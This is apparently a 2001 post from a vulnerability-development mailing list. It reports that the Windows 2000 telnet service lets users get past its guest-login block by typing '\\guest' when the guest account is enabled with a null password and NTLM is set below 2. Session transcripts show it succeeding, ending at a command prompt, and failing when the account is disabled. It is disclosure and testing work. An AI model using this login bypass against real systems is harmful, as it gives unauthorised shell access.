Vulnerability Development mailing list archives

Re: (MSRC HES) : is this something?

From: Philip Stoev <philip () STOEV ORG>
Date: Thu, 18 Jan 2001 09:24:09 +0200

Looks like one needs to have an _enabled_ guest account and NTLM less than 2
in order to be vulnerable. Setting NTLM to 1 does not change this behavoir.
If the guest account has a password on it, one needs to supply it. I also
tried with the Administrator account -- one can get in using both
\\Administrator and Administrator, however the password must be known.

In brief, this seems to work only on enabled guest accounts with null
passwords and NTLM less than 2. I think that there is something in
Microsoft's telnet daemon that is meant to block guest logins, however it
does not block \\guest ones and they go through fine if one knows the
password.

Philip

Against NTLM = 0 and guest account _enabled_ with no password:

Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login: guest
Login through Guest account not allowed
login: \\guest
password:[just hit ENTER]
*===============================================================
Welcome to Microsoft Telnet Server.
*===============================================================
C:\>

Against NTLM = 0 and guest account _disabled_ with no password:

Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login: guest
Login through Guest account not allowed
login: \\guest
password:[hit ENTER here]
Logon failure: account currently disabled.

Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login: guest
Login through Guest account not allowed
login: \\guest
password:
Logon failure: account currently disabled.

Login Failed

login:

Against AD server with NTLM at 0 - Guest acct disabled and acct pwd is
null
Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login: guest
Login through Guest account not allowed
login: \\guest
password:
Logon failure: unknown user name or bad password.

Login Failed